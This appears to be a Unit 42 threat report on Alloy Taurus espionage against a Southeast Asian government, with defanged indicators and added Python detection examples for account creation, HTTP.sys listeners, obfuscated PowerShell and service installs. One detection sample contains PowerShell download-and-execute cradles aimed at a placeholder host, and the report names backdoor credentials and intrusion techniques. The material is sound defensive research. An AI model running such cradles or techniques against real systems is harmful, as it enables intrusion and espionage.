Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus

Executive Summary

We observed a series of intrusions directed at a Southeast Asian government target, a cluster of activity that we attribute with a moderate level of confidence to Alloy Taurus, a group believed to be operating on behalf of Chinese state interests. The multiwave intrusions, which started in early 2022 and persisted throughout 2023, capitalized on vulnerabilities in Exchange Servers to deploy a large number of web shells.

These web shells served as gateways for the introduction of additional tools and malware, some specially crafted for the target environments. These incursions were consistent with techniques used for long-term espionage operations and appeared to be attempts to establish a resilient foothold within the compromised networks.

We found this activity as part of an investigation into compromised environments within a Southeast Asian government. We identified this cluster of activity as CL-STA-0045.

Drawing upon available telemetry and threat intelligence, we attribute this cluster of activity with a moderate level of confidence to the Alloy Taurus group, also known as GALLIUM. This group is widely believed to operate on behalf of Chinese state interests and has been observed in multiple espionage campaigns targeting telecommunication companies and government entities across Southeast Asia, Europe and Africa.

Our description of this cluster of activity provides deep technical insights into the tools and approaches used by the APT and a timeline of activity, providing a rich set of indicators for use by defenders.

Palo Alto Networks customers receive protections against the threats discussed in this article through Advanced WildFire, Advanced URL Filtering, DNS Security, Cortex XDR and Cortex XSIAM, as detailed in the conclusion.

Organizations can engage the Unit 42 Incident Response team for specific assistance with this threat and others.

Related Unit 42 Topics: Government, APTs
Alloy Taurus (aka GALLIUM, Softcell)

Timeline of Activity

Image 1 is a timeline of CL-STA-0045. There are six waves of activity in total. The first wave starts in quarter one of 2022, and the waves continue through quarters two, three and four of 2022 and quarters one through three of 2023.

Figure 1. Timeline of CL-STA-0045.

CL-STA-0045 Details

From Web Shell to Interactive Attack

Each wave of CL-STA-0045 activity started after the attackers gained access to the network and installed several web shells, including China Chopper, on several internet-facing web servers. Using the web shells, the attackers were able to perform an interactive attack that included running reconnaissance commands and tools (e.g., whoami, ipconfig, dir, arp and net, NBTScan) and creating several administrative accounts (named Admin$, Back$, infoma$ and testuser).

The attackers used these accounts to perform additional activities, as shown in Figure 2.

Image 2 is a screenshot of an alert in Cortex XDR. Alert Description: [Redacted] performed 268 new administrative actions in the last twelve hours. This is an uncharacteristically high number of new administrative actions for [redacted].

Figure 2. Suspicious administrative actions alert.
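The account names above (Admin$, Back$, infoma$) follow the Windows convention for machine accounts, which makes a quick scan of account listings less likely to notice them. The following is an added example, not code from the Unit 42 report: a small Python detection that reads constructed Windows Security events (4720 user-account created, 4741 computer-account created) and flags user accounts that are styled like machine accounts, carry throwaway names, or are created on an internet-facing web server. The host list, the name watchlist and the event lines are all constructed for the example.

```python
import re

# Constructed sample telemetry (not from the report): Windows Security events
# flattened to key=value pairs. 4720 = user account created, 4741 = computer
# account created, 4732 = member added to a local group. Host and account
# names are invented for this example.
SAMPLE_EVENTS = """\
EventID=4720 Computer=EXCH01 SubjectUserName=SYSTEM TargetUserName=Admin$ TargetDomainName=CORP
EventID=4720 Computer=EXCH01 SubjectUserName=SYSTEM TargetUserName=Back$ TargetDomainName=CORP
EventID=4741 Computer=DC01 SubjectUserName=Administrator TargetUserName=SRV02$ TargetDomainName=CORP
EventID=4720 Computer=DC01 SubjectUserName=helpdesk TargetUserName=jsmith TargetDomainName=CORP
EventID=4720 Computer=EXCH01 SubjectUserName=SYSTEM TargetUserName=testuser TargetDomainName=CORP
EventID=4732 Computer=EXCH01 SubjectUserName=SYSTEM TargetUserName=Admin$ TargetDomainName=CORP
"""

KV_RE = re.compile(r"(\w+)=(\S+)")

# Assumptions for this example: the defender knows which hosts are
# internet-facing web servers and keeps a short watchlist of throwaway names.
WEB_SERVERS = {"EXCH01", "WEB02"}
GENERIC_NAMES = {"testuser", "test", "admin", "backup", "temp"}


def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(KV_RE.findall(line))


def flag_account_creations(log_text, web_servers=WEB_SERVERS):
    """Return (account name, [reasons]) for every 4720 event that looks suspicious."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4720":      # only user-account creations
            continue
        name = ev["TargetUserName"]
        reasons = []
        # Real machine accounts arrive as 4741; a *user* account ending in '$'
        # is styled to hide among them in account listings.
        if name.endswith("$"):
            reasons.append("user account named like a machine account")
        if name.lower() in GENERIC_NAMES:
            reasons.append("generic or throwaway account name")
        # Account creation driven from an internet-facing web server is how
        # a web-shell operator typically obtains a first persistent identity.
        if ev.get("Computer") in web_servers:
            reasons.append("created on an internet-facing web server")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in flag_account_creations(SAMPLE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

The same rule set can be pointed at a SIEM export of 4720 events; the web-server and watchlist sets are the only parts that need tuning per environment.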

The attackers also used two scanners. The first was Fscan, which is an open-source internal network scanner written by a Mandarin speaker called “shadow1ng.” Various research organizations have reported multiple Chinese APT groups using this tool. The second scanner was WebScan, a browser-based network IP scanner and local IP detector.

Undocumented .NET Backdoors

Following the creation of the users and the reconnaissance activity, the attackers attempted to execute a previously undocumented .NET backdoor, which they named windows.exe. We named this threat Reshell based on its program database (PDB) path.

The backdoor is relatively simple. The attackers configured it to communicate with the IP 23.106.122[.]46, which gave them an easy way to execute arbitrary commands remotely.

Image 3 is a screenshot of six lines of code. This is the embedded command and control in the Reshell binary.

Figure 3. Embedded C2 in the Reshell binary.

After Cortex XDR prevented execution of the Reshell backdoor, the attackers likely suspected something was not right and tried to check for the connection using the netstat command. They searched for IP addresses in the range 23.106* and made a connectivity check, as shown in Figure 4.

Image 4 is a screenshot of a tree diagram in Cortex XDR. The tree begins with httpd.exe. Some information is redacted. Included are two commands as well as the action Cortex XDR took (blocking).

Figure 4. Reshell execution and connectivity check.

The attackers tried to execute another undocumented .NET backdoor, which we call Zapoa. This backdoor opens an HTTP listener, specifically looking for inbound requests to the server that match the following UrlPrefix, which contains a wildcard to match all hostnames within the URL: https://*:443/256509101/.
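A listener registered through HTTP.sys with a prefix like https://*:443/256509101/ can share port 443 with IIS and Exchange, because HTTP.sys routes requests by URL prefix rather than by socket owner. That makes the registered prefix list a useful hunting surface. The following is an added example, not code from the report: a Python check that parses output in the shape of `netsh http show servicestate` (the sample text is constructed, and the baseline of expected prefixes is an assumption) and flags registrations that are not in the baseline, noting wildcard host bindings, use of the standard HTTPS port and the numeric-only path seen in the Zapoa prefix.

```python
import re

# Constructed sample in the shape of `netsh http show servicestate` output
# (assumption: the real command prints many more fields; only the lines under
# "Registered URLs:" matter to this check). The third prefix is the Zapoa
# pattern from the report.
SAMPLE_NETSH = """\
Snapshot of HTTP service state (Server Session View):
-----------------------------------------------------

Server session ID: FF00000020000001
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Number of registered URLs: 3
        Registered URLs:
            HTTP://+:5985/WSMAN/
            HTTP://*:47001/WSMAN/
            HTTPS://*:443/256509101/
"""

URL_LINE_RE = re.compile(r"^\s*(https?://\S+)\s*$", re.IGNORECASE)
PREFIX_RE = re.compile(
    r"^(?P<scheme>https?)://(?P<host>[^/:]+):(?P<port>\d+)(?P<path>/.*)$", re.IGNORECASE
)

# Assumption: a per-host baseline of prefixes that are expected (here, WinRM).
BASELINE = {"http://+:5985/wsman/", "http://*:47001/wsman/"}


def extract_url_prefixes(netsh_text):
    """Pull every registered URL prefix out of netsh output."""
    return [m.group(1) for line in netsh_text.splitlines() if (m := URL_LINE_RE.match(line))]


def flag_unexpected_prefixes(netsh_text, baseline=BASELINE):
    """Return (prefix, [reasons]) for registrations outside the baseline."""
    findings = []
    for prefix in extract_url_prefixes(netsh_text):
        if prefix.lower() in baseline:
            continue
        reasons = ["not in host baseline"]
        m = PREFIX_RE.match(prefix)
        if m:
            # '*' (weak wildcard) or '+' (strong wildcard) binds every hostname.
            if m["host"] in ("*", "+"):
                reasons.append("wildcard host binding")
            # HTTP.sys routes by prefix, so a second listener can share port 443
            # with IIS/Exchange and blend into normal web traffic.
            if m["scheme"].lower() == "https" and m["port"] == "443":
                reasons.append("shares the standard HTTPS port with the web server")
            if m["path"].strip("/").isdigit():
                reasons.append("numeric-only path segment (Zapoa-style)")
        findings.append((prefix, reasons))
    return findings


if __name__ == "__main__":
    for prefix, reasons in flag_unexpected_prefixes(SAMPLE_NETSH):
        print(prefix, "->", "; ".join(reasons))
```

Run it against saved netsh output from each Exchange or IIS host; anything outside the baseline deserves a look at which process owns the request queue.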

This backdoor uses the string P88smzTpVBDjwiUv within the HTTP POST data to authenticate its C2. It provides the operator with a wide range of capabilities, including:

Preparing the Ground

The attackers continued to perform additional activities to maintain a foothold in the environment. To prepare the ground, bypass security mitigation efforts and hide from the security team, the attackers installed SoftEther VPN software.

The attackers renamed the SoftEther VPN file to Taskllst.exe, as shown in Figure 5. In other instances, they renamed it to fonts.exe and vmtools.exe.

Using this software, the attackers connected to different hosts inside and outside the network such as GitHub (as observed in Figure 5). They also downloaded additional tools such as Kerbrute, LsassUnhooker and GoDumpLsass, which they used in the next phase of the attack.

Image 5 is a screenshot of a table in Cortex XDR. The columns are, from left to right, Source Process Name, Source Signer, and Destination Host. Two .exe files are listed. The signer for both is SoftEther Corporation. The destination host is GitHub.

Figure 5. Connection to GitHub by SoftEther VPN - taskllst.exe.

Stealing Credentials

Since the attackers had already gained a local administrator account, the next step was to gain domain credentials to move laterally inside the network. To do so, the attackers tried different techniques and tools.

Image 6 is a screenshot of a tree diagram in Cortex XDR. The tree begins with httpd.exe. Some information is redacted. Included are two commands as well as the action Cortex XDR took (blocking).

Figure 6. Detection and prevention of Kerbrute and GoDumpLsass execution.

A string of code that allows an attacker to search for passwords within configuration files.

A string of code to dump the Lsass process.

The attackers also tried other tools to dump the Lsass process, including the following:

Image 7 is a screenshot of a tree diagram in Cortex XDR. Some information is redacted. The tree splits once and has four branches. Included are the commands used by the threat actor. The main action prevented is InternalMonologue.exe.

Figure 7. Detection and prevention of NTLM downgrade attack and credential theft.

Targeting Critical Assets

After obtaining credentials, the attackers attempted to move laterally inside the network, aiming specifically at web servers and domain controllers.

The attackers first tried using the SoftEther VPN, attempting to create connections to the targets on SMB (port 445). Later in the attack, the attackers changed their tactic and moved laterally by abusing the remote administration tool AnyDesk. This tool was already present in the compromised environment.

The attackers set the password for AnyDesk to be J9kzQ2Y0qO, which is the same password reported multiple times as being used in Conti ransomware attacks.

Command line to set password

We observed no attempt to execute ransomware.

Installing Additional Tools

In addition to the already installed tools mentioned above, the attackers attempted to install other tools and malware to help perform malicious activities and maintain a foothold in the environment. Among these tools were the following:

Cobalt Strike

The attackers attempted to create a connection to the domain images.cdn-sina[.]tw to download a file named scvhost.txt. This file was a Cobalt Strike beacon, which Cortex XDR prevented from executing, as shown in Figure 8.

Image 8 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has four branches. Included are the commands used by the threat actor. Two actions are prevented: scvhost.txt and result.txt.

Figure 8. Blocked execution of payloads from images.cdn-sina[.]tw.

In another attempt to execute Cobalt Strike, the attackers created services to run the beacon (Reset.cpl, help.exe) using the living-off-the-land binaries and scripts (LOLBAS) method of abusing the Windows Shell Common DLL (Shell32.dll), as highlighted in the below code snippet and shown in full in Figure 9.

A string of code that abuses Shell32.dll.

Image 9 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has three branches. Included are the commands used by the threat actor. The execution of Cobalt Strike is blocked.

Figure 9. Blocked execution of Cobalt Strike by abusing the Windows Shell Common DLL.

Reverse SSH Tunneling

Attackers established a reverse Secure Shell (SSH) tunnel that allowed direct Remote Desktop Protocol (RDP) connection to the compromised host so they could interact with AnyDesk remotely. To do this, the attackers tried to use HTran (lcx.111) to tunnel RDP connections to their C2 (154.55.128[.]129, as shown in Figure 10).

In an attempt to overcome the mitigation efforts, the attackers also tried another SSH tunneling tool, PuTTY. The attackers downloaded a file named result.txt from the same domain mentioned above (images.cdn-sina[.]tw); this file is the PuTTY binary.

Using the PuTTY binary in one compromised environment, the attackers attempted to create an SSH tunnel to 159.223.85[.]37. In another compromised environment, the attackers tried to tunnel to both that IP and 156.251.162[.]29.

The attackers kept using those tools, sometimes with the same naming convention and the same infrastructure, across multiple victims in the government sector in the Southeast Asian country.

Image 10 is a screenshot of a tree diagram with two branches in Cortex XDR. It shows the detection and prevention of HTran and Plink execution. Some information has been redacted.

Figure 10. Detection and prevention of HTran and Plink execution.

Downloading Additional Tools via PowerShell

In addition to Cobalt Strike and PuTTY, which the attackers downloaded from images.cdn-sina[.]tw, they also used another subdomain (Shell.cdn-sina[.]tw, which resolved to 78.142.246[.]117). Attackers used it to store additional tools, including victim-specific scripts.

To access those tools, the attackers used Windows Management Instrumentation (WMI) and PowerShell with the following command line.

A string of code used to access stored additional tools.

The attackers tried to bypass antivirus detections that rely on keyword matching of download operations (for example, searching the command line for the string DownloadString).
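A detection that only looks for the literal substring DownloadString is exactly what the evasion above targets. The robust approach is to normalize the command line before matching: decode -EncodedCommand, strip backtick escapes, join string concatenations and lower-case the result, then apply keyword rules to the canonical form. The following is an added example, not code from the report: a Python scanner over constructed process events (parent process names, the placeholder host and the obfuscated forms are all invented for the example) that also notes when PowerShell was launched by the WMI provider host, matching the WMI-plus-PowerShell step described above.

```python
import base64
import re

# Constructed sample process events (not from the report). Parent/child names
# and the placeholder host are invented; the obfuscation forms are generic ones
# that defeat a naive substring match on "DownloadString".
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/b.ps1')".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {"id": 1, "parent": "WmiPrvSE.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')\""},
    {"id": 2, "parent": "cmd.exe",
     "cmdline": "powershell -c \"IEX (New-Object Net.WebClient).('Down'+'load'+'String').Invoke('http://placeholder.invalid/a.ps1')\""},
    {"id": 3, "parent": "cmd.exe",
     "cmdline": "powershell -enc " + _ENCODED},
    {"id": 4, "parent": "explorer.exe",
     "cmdline": "powershell -c \"Get-Service | Where-Object Status -eq Running\""},
]

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Replace a -EncodedCommand argument with its UTF-16LE plaintext."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start()] + decoded


def normalize(cmdline):
    """Canonical form for matching: decoded, de-escaped, concatenations joined, lower-case."""
    s = decode_encoded_command(cmdline)
    s = s.replace("`", "")                    # backtick escapes split identifiers
    s = re.sub(r"['\"]\s*\+\s*['\"]", "", s)  # 'Down'+'load' -> 'Download'
    s = re.sub(r"\s+", " ", s)
    return s.lower()


# Each rule is applied to the normalized command line.
RULES = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest")),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression")),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden")),
]


def scan(events):
    """Return (event id, [labels]) for every event at least one rule matches."""
    findings = []
    for ev in events:
        norm = normalize(ev["cmdline"])
        labels = [name for name, rx in RULES if rx.search(norm)]
        # PowerShell launched by the WMI provider host is how a WMI-driven
        # download step surfaces in process telemetry; add it as context.
        if ev["parent"].lower() == "wmiprvse.exe" and labels:
            labels.append("launched via WMI")
        if labels:
            findings.append((ev["id"], labels))
    return findings


if __name__ == "__main__":
    for event_id, labels in scan(SAMPLE_EVENTS):
        print(event_id, labels)
```

The normalization step is what matters: once the command line is canonical, the keyword rules stay simple and the benign event (id 4) is left alone.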

The attackers also downloaded PowerCat (the PowerShell version of the networking utility netcat) from the same domain, using the IP this time. They then ran this utility with the same IP previously used by the attackers as a parameter for Plink.

A string of code to run the utility netcat.

Quasar RAT

Another type of malware that the attackers attempted to use is Quasar RAT. Different threat actors around the world use this off-the-shelf tool. The malware provides its operator with a wide set of capabilities, including the following:

As observed in Figure 11, the actor put the Quasar RAT dropper (l.exe) in the C:/Recovery folder, which dropped the Quasar RAT loader (loader.any) and tried to execute it.

Image 11 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has two branches. Two actions are prevented (blocked). These are l.exe and regsvr32.exe Loader.any.

Figure 11. Prevention of Quasar RAT execution.

HDoor

The attackers also used a customized version of the Chinese backdoor HDoor. HDoor has been publicly available in Chinese forums since at least 2008. Various research organizations have reported that multiple Chinese APT groups have used this threat, such as Growing Taurus (aka Naikon) and Parched Taurus (aka Goblin Panda).

HDoor is equipped with full backdoor capabilities, allowing the operator to perform a variety of tasks, including the following:

HDoor was executed using the following command line arguments:

A string of code to execute Hdoor.

Gh0stCringe RAT

Another piece of malware that the attackers tried to use is Gh0stCringe, which is based on the source code of Gh0st RAT. The attackers tried to execute this tool twice, with a gap of over 10 days between executions.

In the first execution, the attackers attempted to execute the malware dropper, which was named Cssrs.exe. This dropped the Gh0stCringe binary, named moon.exe, and executed it. Figure 12 shows this activity.

Image 12 is a screenshot of a diagram in Cortex XDR. The execution of moon.exe is blocked.

Figure 12. Gh0stCringe process tree.

The second time, the attackers tried to execute Gh0stCringe by the name conhost.exe as shown in Figure 13. They created the malware under the ESET folder C:\ProgramData\ESET\RemoteAdministrator\Agent\conhost.exe.

Although this folder is legitimate and contains ESET-related files that were legitimately installed in the victim’s environment, the use of this folder to store malicious payloads is not common.

However, we note that in the same environment, we saw the threat actors behind a different cluster, CL-STA-0044, abusing ERAAgent.exe to execute the ToneShell malware.

Image 13 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has two branches. Included are the commands used by the threat actor. The execution of conhost.exe is blocked. Some information is redacted.

Figure 13. Executing Gh0stCringe from the ESET folder.

A Variant of the Winnti Malware

In January 2023, we observed the actors attempting to install a variant of the Winnti malware family. According to an April 11, 2013, blog written by Kaspersky, Winnti is a prominent malware family used by multiple Chinese threat groups since at least 2011.

To install this particular variant of Winnti, the actor saved two files (rs.exe and s.dll) to the system within the folder D:\HPEOneView\\admin\.!\.dump. The rs.exe executable is a loader that copies the s.dll payload to the location %SYSTEM%\lscsrv.dll and creates a service named Lscsrv with it.
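Both the Cobalt Strike services described earlier (Reset.cpl and help.exe run through the Windows Shell Common DLL) and the Lscsrv service created by this Winnti loader surface the same way on the host: a "service installed" event (System log 7045) whose image path or hosted DLL does not belong. The following is an added example, not code from the report: a Python check over constructed 7045-style events that flags services whose image is a script or DLL host such as rundll32, services that invoke Shell32's Control_RunDLL export to run a .cpl payload, and svchost-hosted services whose ServiceDll is outside a baseline. Two assumptions are labelled in the code: the ServiceDll field is something a collector would have to read from the service's registry Parameters key (the 7045 event itself only carries ImagePath), and the rundll32 shell32.dll,Control_RunDLL command form is taken from public LOLBAS documentation as the way a Shell32-hosted service would look, since the page does not show the exact command line.

```python
import re

# Constructed sample of "service installed" events (System log 7045) flattened
# to key=value pairs. ServiceDll is an assumption: a collector would have to
# read it from the service's Parameters key, since 7045 only carries ImagePath.
# The Control_RunDLL command form is the public LOLBAS shape, not the page's
# exact command. Names and paths are invented, modelled on the report's Lscsrv
# service and the Shell32-hosted Cobalt Strike services.
SERVICE_EVENTS = r"""
EventID=7045 ServiceName=Lscsrv ImagePath="C:\Windows\System32\svchost.exe -k netsvcs" ServiceDll=C:\Windows\System32\lscsrv.dll StartType=auto
EventID=7045 ServiceName=help ImagePath="rundll32.exe shell32.dll,Control_RunDLL C:\Users\Public\Reset.cpl" StartType=demand
EventID=7045 ServiceName=wuauserv ImagePath="C:\Windows\System32\svchost.exe -k netsvcs" ServiceDll=C:\Windows\System32\wuaueng.dll StartType=auto
EventID=7045 ServiceName=BackupAgent ImagePath="C:\Program Files\Vendor\agent.exe" StartType=auto
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
LOLBAS_HOSTS = re.compile(
    r"\b(rundll32|regsvr32|mshta|cmd|powershell|wscript|cscript)(\.exe)?\b", re.IGNORECASE
)

# Assumption: baseline of svchost-hosted service DLLs captured from a clean host.
KNOWN_SERVICE_DLLS = {"wuaueng.dll"}


def parse_events(log_text):
    """Yield one dict per non-empty key=value line, with quotes stripped."""
    for line in log_text.splitlines():
        if line.strip():
            yield {k: v.strip('"') for k, v in KV_RE.findall(line)}


def flag_service_installs(log_text, known_dlls=KNOWN_SERVICE_DLLS):
    """Return (service name, [reasons]) for every 7045 event that looks suspicious."""
    findings = []
    for ev in parse_events(log_text):
        if ev.get("EventID") != "7045":
            continue
        image = ev.get("ImagePath", "")
        reasons = []
        # A real service runs a service binary; a script/DLL host as the image
        # means the actual payload lives in the arguments.
        if LOLBAS_HOSTS.search(image):
            reasons.append("service image is a script/DLL host, not a service binary")
        if "shell32.dll" in image.lower() and "control_rundll" in image.lower():
            reasons.append("Shell32 Control_RunDLL used to run a .cpl payload")
        # svchost-hosted services are only as trustworthy as the DLL they load.
        dll = ev.get("ServiceDll")
        if dll:
            dll_name = dll.rsplit("\\", 1)[-1].lower()
            if dll_name not in known_dlls:
                reasons.append(f"svchost-hosted service loads unbaselined DLL {dll_name}")
        if reasons:
            findings.append((ev["ServiceName"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in flag_service_installs(SERVICE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

The DLL baseline is the part that needs care: build it from a clean reference build of each server role, and pair a hit with a check of the DLL's signature and creation time, since the report's loader wrote lscsrv.dll into %SYSTEM% immediately before registering the service.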

This beacon leads us to believe this is a variant of the Winnti malware. It has several overlaps with the beacon created by the Winnti malware discussed in Kaspersky’s blog:

At a high level, this Winnti variant has the following capabilities available for the actor to use:

Attribution

We identified CL-STA-0045 activity on multiple entities of the same government in Southeast Asia around the same time frame. The clustering of the activity was based on the use of the same tools, malware, similar techniques and tactics, and in some cases shared infrastructure.

Analysis of activity of the threat actor behind CL-STA-0045, in combination with third-party reporting, presents noteworthy overlaps with the reported modus operandi of Alloy Taurus (aka GALLIUM).

The threat actor used a combination of tools and malware during its operation that, when grouped together in a single operation, presents a distinctive playbook.

As part of this cluster of activity, some of the main tools used together include the following:

The combination of these tools in a single operation has only been previously reported as part of Alloy Taurus operations.

In addition, our analysis of the activity showed a repetitive style of attack, in which the threat actor attacked in waves. Each wave started with web server exploitation as well as installation of web shells and reconnaissance. This was then followed by the deployment of additional tools. This manner of operation, with the tools listed above, overlaps with the behavior reported in Operation SoftCell.

Furthermore, Unit 42 internal telemetry shows an infrastructure overlap with the activity described in CL-STA-0045, observed on one of the compromised entities belonging to the same government. The threat actor behind this cluster used a renamed SoftEther VPN to hide its connection to its C2 server.

In one instance of this activity cluster, the communication we observed was to an infrastructure that overlaps with the IP address 196.216.136[.]139 that we mentioned in our post Chinese Alloy Taurus Updates PingPull Malware. Our telemetry also suggests that Alloy Taurus was active in the same environment in Q3 and Q4 of 2022, which aligns with CL-STA-0045 activity from a timeline perspective.

We observed the activity specifically associated with CL-STA-0045 targeting the government sector in Southeast Asia. Alloy Taurus was previously reported to target the government sector in that region.

The combination of tools used in CL-STA-0045, the analysis of the threat actor’s modus operandi, the victimology of this cluster and overlaps with Unit 42 internal telemetry led us to estimate with a moderate level of confidence that the threat actor behind CL-STA-0045 is likely the Alloy Taurus APT group.

Conclusion

CL-STA-0045 activity represents a significant threat to government entities in Southeast Asia. The threat actor behind this cluster employed a mature approach, utilizing multiwave intrusions and exploiting vulnerabilities in Exchange Servers as their main penetration vector. We estimate that the main goal behind the activity was to facilitate long-term espionage operations.

Based on the available telemetry, we attribute this cluster of activity with a moderate level of confidence to the Alloy Taurus group. This threat actor poses a significant threat to regional security and warrants heightened attention from affected organizations and governments in the region.

The findings of this investigation underscore the urgent need for enhanced security measures, vigilant monitoring and proactive threat intelligence sharing among government entities and affected industries in Southeast Asia. By adopting a multilayered defense approach and staying informed about emerging threats, organizations can better protect themselves against the persistent and evolving tactics employed by threat actors such as Alloy Taurus.

Protections and Mitigations

For Palo Alto Networks customers, our products and services provide the following coverage associated with the threats described above:

If you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Web Shells

Reshell Backdoor

Zapoa Backdoor

Cobalt Strike

Quasar RAT

HDoor

Gh0stCringe RAT

Fscan

WebScan

Kerbrute

LsassUnhooker

InternalMonologue.exe

Infrastructure

Reshell URI Pattern

Additional Resources